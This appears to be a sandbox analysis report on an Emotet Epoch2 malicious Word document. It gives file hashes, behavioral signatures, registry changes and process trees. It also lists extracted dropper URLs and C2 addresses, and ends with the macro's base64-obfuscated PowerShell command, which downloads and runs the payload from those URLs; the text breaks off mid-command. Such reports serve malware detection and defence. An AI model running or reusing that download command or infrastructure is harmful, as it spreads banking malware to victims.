emotet | 21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac

General

Target

emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc
Size

218KB
MD5

8d7f667c5911d8e6c24bcbdbfe56b497
SHA1

e13f9c603441f701c0ca9a53bb9b69eb5cb071a9
SHA256

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac
SHA512

cc60e5138a4f1ff38329f30507a2840550758ca1bc0469f9c347ed735eb55b9af8ae69eb0dd646d4a22189e38812a6b386d66c7df3a25d3d770297556993b9e0

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.saintmarcel.com/wp-includes/VKbL2/

exe.dropper

https://gayatrienterprise.org/wp-admin/DPBsj/

exe.dropper

https://weparditestaa.fi/wp-admin/72uPk/

exe.dropper

https://blog.6b47.com/Assets/w5U/

exe.dropper

https://www.easeiseasy.com/wp-admin/q/

exe.dropper

https://ursuperstar.com/wp-admin/AAxKlbV/

exe.dropper

https://kramedas.lt/wp-admin/E9Gciyc/

exe.dropper

https://critical-thinking.fr/wp-includes/vHQWren/

Extracted

Family

emotet

Botnet

Epoch2

C2

80.227.52.78:80

51.89.199.141:8080

173.212.214.235:7080

167.114.153.111:8080

61.19.246.238:443

37.179.204.33:80

190.164.104.62:80

95.9.5.93:80

138.68.87.218:443

176.111.60.55:8080

194.190.67.75:80

66.76.12.94:8080

190.29.166.0:80

139.59.60.244:8080

184.180.181.202:80

49.50.209.131:80

24.133.106.23:80

121.7.31.214:80

185.94.252.104:443

50.91.114.38:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 828 POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1452	828	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/436-13-0x0000000001E60000-0x0000000001EA2000-memory.dmp	emotet
behavioral1/memory/436-12-0x0000000001E10000-0x0000000001E53000-memory.dmp	emotet
behavioral1/memory/540-17-0x0000000002080000-0x00000000020C3000-memory.dmp	emotet
behavioral1/memory/540-18-0x00000000020D0000-0x0000000002112000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

8 1452 POwersheLL.exe
10 1452 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

R1s2f0emk.exemsrle32.exe

pid process

436 R1s2f0emk.exe
540 msrle32.exe

flow	pid	process
8	1452	POwersheLL.exe
10	1452	POwersheLL.exe

pid	process
436	R1s2f0emk.exe
540	msrle32.exe

Drops file in System32 directory 2 IoCs

Processes:

POwersheLL.exeR1s2f0emk.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POwersheLL.exe
File opened for modification	C:\Windows\SysWOW64\unlodctr\msrle32.exe	R1s2f0emk.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\TypeLib	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\TypeLib\{2E4265D2-70F4-438B-B12E-FC3BDD7118F6}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\TypeLib\{2E4265D2-70F4-438B-B12E-FC3BDD7118F6}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

748 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

POwersheLL.exemsrle32.exe

pid process

1452 POwersheLL.exe
1452 POwersheLL.exe
540 msrle32.exe
540 msrle32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 1452 POwersheLL.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXER1s2f0emk.exemsrle32.exe

pid process

748 WINWORD.EXE
748 WINWORD.EXE
436 R1s2f0emk.exe
540 msrle32.exe

pid	process
748	WINWORD.EXE

pid	process
1452	POwersheLL.exe
1452	POwersheLL.exe
540	msrle32.exe
540	msrle32.exe

description	pid	process
Token: SeDebugPrivilege	1452	POwersheLL.exe

pid	process
748	WINWORD.EXE
748	WINWORD.EXE
436	R1s2f0emk.exe
540	msrle32.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

R1s2f0emk.exe

description	pid	process	target process
PID 436 wrote to memory of 540	436	R1s2f0emk.exe	msrle32.exe
PID 436 wrote to memory of 540	436	R1s2f0emk.exe	msrle32.exe
PID 436 wrote to memory of 540	436	R1s2f0emk.exe	msrle32.exe
PID 436 wrote to memory of 540	436	R1s2f0emk.exe	msrle32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:748

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD UwBlAHQALQBJAFQARQBNACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBQAFYASgBVACAAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQBNAC4AJwAsACcAaQBvAC4ARABpAHIAZQAnACwAJwBjAFQAbwByAFkAJwAsACcAUwB5AHMAVAAnACkAKQAgADsAIAAgACQARABUAE4AbQByAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADUAfQAiACAALQBGACcAcwB5AHMAdABlAE0ALgBuAEUAdAAuAFMAZQBSAHYASQBjAGUAJwAsACcAYQBuACcALAAnAFQAbQAnACwAJwBwACcALAAnAG8ASQBuACcALAAnAGEARwBlAFIAJwApACAAOwAgACQAVgB3ADYAMQB2AHAAdQA9ACgAJwBCACcAKwAoACcAMgAnACsAJwBoAHcAOQAnACkAKwAnADIAeAAnACkAOwAkAEUAagAyAHAAMQA1ADIAPQAkAEEAMwBhAHMANwBxAGEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAZAA5AGwAdgB4AG8AOwAkAE8AdQB2AGQAXwBhAG0APQAoACcAVwAnACsAKAAnAGUAMQAnACsAJwBfACcAKQArACgAJwAzACcAKwAnADMAcAAnACkAKQA7ACAAKAAgAGcASQAgACAAVgBhAFIASQBhAGIATABlADoAcAB2AGoAdQAgACkALgBWAEEAbAB1AGUAOgA6ACIAQwBgAFIARQBBAHQAZQBkAGAASQByAGAARQBDAHQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnADcAJwArACcAbwBQAFEAJwApACsAKAAnAHEANQA0ACcAKwAnADEAMAAnACsAJwBvADcAbwBQAFkAcQAnACkAKwAnAHIAdAAnACsAKAAnAGgAdAAxACcAKwAnADcAbwAnACkAKwAnAFAAJwApACAAIAAtAEMAcgBFAFAATABBAGMAZQAoAFsAQwBIAEEAUgBdADUANQArAFsAQwBIAEEAUgBdADEAMQAxACsAWwBDAEgAQQBSAF0AOAAwACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABVADUAcwBxAHQAaABrAD0AKAAoACcAUAAnACsAJwBlAGMAJwApACsAKAAnAHMAcgBqACcAKwAnAGUAJwApACkAOwAgACgAIAAgAEcAZQB0AC0AVgBhAHIASQBhAGIATABlACAARAB0AG4ATQBSACkALgB2AEEATABVAEUAOgA6ACIAcwBlAEMAdQByAGAASQBUAGAAeQBQAFIATwB0AG8AQwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEkAdgBjAG4AZgB1AHoAPQAoACcATAAzACcAKwAnAHgAMwAnACsAKAAnADIAJwArACcAYQAwACcAKQApADsAJABNADMAegB5ADkAMQBqACAAPQAgACgAJwBSADEAJwArACgAJwBzACcAKwAnADIAZgAnACkAKwAnADAAJwArACgAJwBlAG0AJwArACcAawAnACkAKQA7ACQATQA2ADkANgAzAHgAYQA9ACgAKAAnAFEAJwArACcAZwAxACcAKQArACgAJwBiAGQAJwArACcAagAnACkAKwAnAGYAJwApADsAJABaADIAdgB0AHgAdgBnAD0AKAAoACcAVgAyADIAJwArACcAbgAnACkAKwAnAGsAbgAnACsAJwByACcAKQA7ACQAVABqAG0AbwA3AHkAZgA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBsAGUAJwArACcAUQBxADUAJwApACsAKAAnADQAMQAnACsAJwAwACcAKQArACcAbwBSACcAKwAnAGwAZQAnACsAKAAnAFkAcQAnACsAJwByAHQAJwApACsAKAAnAGgAdAAxAFIAJwArACcAbAAnACkAKwAnAGUAJwApAC4AIgBSAEUAUABgAEwAYABBAEMAZQAiACgAKAAnAFIAJwArACcAbABlACcAKQAsAFsAUwBUAHIASQBuAGcAXQBbAEMAaABhAHIAXQA5ADIAKQApACsAJABNADMAegB5ADkAMQBqACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAQwA4AGMANgBkAHcAYQA9ACgAJwBUACcAKwAoACcAcQAnACsAJwBuADMAJwApACsAKAAnAGcAJwArACcAeAB4ACcAKQApADsAJABYADAAMgB2AGIAYwBuAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMATABpAEUATgBUADsAJABBAGQANAAwAGwAOABoAD0AKAAoACgAKAAnAGgAdAB0AHAAcwAnACsAJwA6AF0AWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagBrAGcAJwArACcAUwAgAFsAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQB3AHcAdwB3ACcAKwAnAC4AcwBhAGkAbgAnACkAKQArACgAKAAnAHQAbQBhAHIAYwAnACsAJwBlAGwAJwArACcALgBjAG8AbQAnACsAJwBdAFsAIAAnACsAJwAxACcAKwAnACkAIAAnACsAJwBqACcAKwAnAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwB3AHAALQAnACsAJwBpAG4AYwBsAHUAZABlAHMAXQBbACAAMQApACAAJwArACcAagBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAVgBLAGIATAAyAF0AWwAgADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAJwApACkAKwAoACgAJwBdACAAJwArACcAWwBdACcAKwAnAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIABqAGoAJwArACcAawBnAFMAIABbAF0AJwArACcAIABbACcAKwAnAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAawBnAFMAIABbAF0AIAAnACsAJwBbAF0AJwArACcAdwBnAGEAeQBhAHQAcgBpAGUAbgB0AGUAcgBwAHIAJwApACkAKwAoACgAJwBpAHMAZQAuAG8AJwArACcAcgBnAF0AWwAgADEAKQAgAGoAJwArACcAagAnACsAJwBrACcAKQApACsAKAAoACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAdwBwACcAKwAnAC0AYQBkAG0AaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAagBrAGcAUwAgACcAKwAnAFsAXQAgAFsAXQB3AEQAUABCAHMAJwArACcAagBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAJwApACkAKwAoACcAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwBAAGgAdAAnACkAKwAoACgAJwB0AHAAcwAnACsAJwA6ACcAKwAnAF0AWwAnACsAJwAgACcAKwAnADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAXQAgAFsAXQAnACsAJwB3AF0AWwAnACsAJwAgACcAKQApACsAKAAoACcAMQApACAAJwArACcAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAdwBlAHAAJwArACcAYQAnACsAJwByAGQAJwArACcAaQB0AGUAJwArACcAcwAnACsAJwB0AGEAYQAuAGYAaQBdAFsAIAAxACcAKwAnACkAIAAnACsAJwBqAGoAawBnAFMAIABbAF0AJwArACcAIABbAF0AdwAnACkAKQArACgAKAAnAHcAJwArACcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwBdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnAFMAIABbAF0AIABbAF0AdwA3ADIAdQAnACkAKQArACgAKAAnAFAAawBdAFsAIAAxACcAKwAnACkAJwArACcAIAAnACsAJwBqAGoAawBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbAF0AdwBAACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgACcAKQArACgAKAAnAFsAJwArACcAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgA2AGIANAA3ACcAKwAnAC4AYwBvAG0AXQBbACAAJwArACcAMQApACcAKQApACsAKAAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwBdACAAWwAnACsAJwBdAHcAQQBzAHMAZQB0AHMAXQBbACcAKQArACgAKAAnACAAMQApACAAJwArACcAagBqACcAKwAnAGsAJwArACcAZwAnACsAJwBTACAAWwBdACAAWwBdAHcAdwA1AFUAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAQAAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzACcAKwAnAD